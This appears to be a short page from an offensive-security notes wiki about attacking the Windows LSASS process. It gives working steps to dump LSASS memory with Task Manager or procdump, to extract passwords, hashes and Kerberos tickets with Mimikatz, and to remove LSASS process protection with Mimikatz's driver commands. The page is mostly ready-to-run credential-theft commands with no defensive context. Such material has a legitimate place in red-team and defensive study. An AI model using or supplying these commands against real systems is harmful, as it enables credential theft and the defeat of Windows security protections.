Local Security Authority Subsystem Service (LSASS)

LSASS (Local Security Authority Subsystem Service)

LSASS is a critical Windows system process responsible for performing security operations such as verifying logged-in accounts and storing sensitive data like passwords, hashes, and Kerberos tickets.

Dumping LSASS Process

To dump the LSASS process, you can use the Task Manager or Sysinternals Suite.

Using Task Manager:

Open Task Manager.
Locate and right-click the lsass.exe process.
Select "Create Dump File" to save the dump locally.

Using Sysinternals Suite:

procdump.exe -accepteula -ma lsass.exe <DUMP FILE>

Extracting Credentials with Mimikatz

Mimikatz can be used to extract credentials from an LSASS dump.

mimikatz # privilege::debug  
mimikatz # sekurlsa::logonpasswords

Bypassing LSASS Protection

LSASS protection can be enabled by setting the following registry value:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa

To bypass this protection with Mimikatz:

mimikatz # !+  
mimikatz # !processprotect /process:lsass.exe /remove  
mimikatz # sekurlsa::logonpasswords

PreviousSecurity Account Manager (SAM)NextCredential manager

Last updated 7 months ago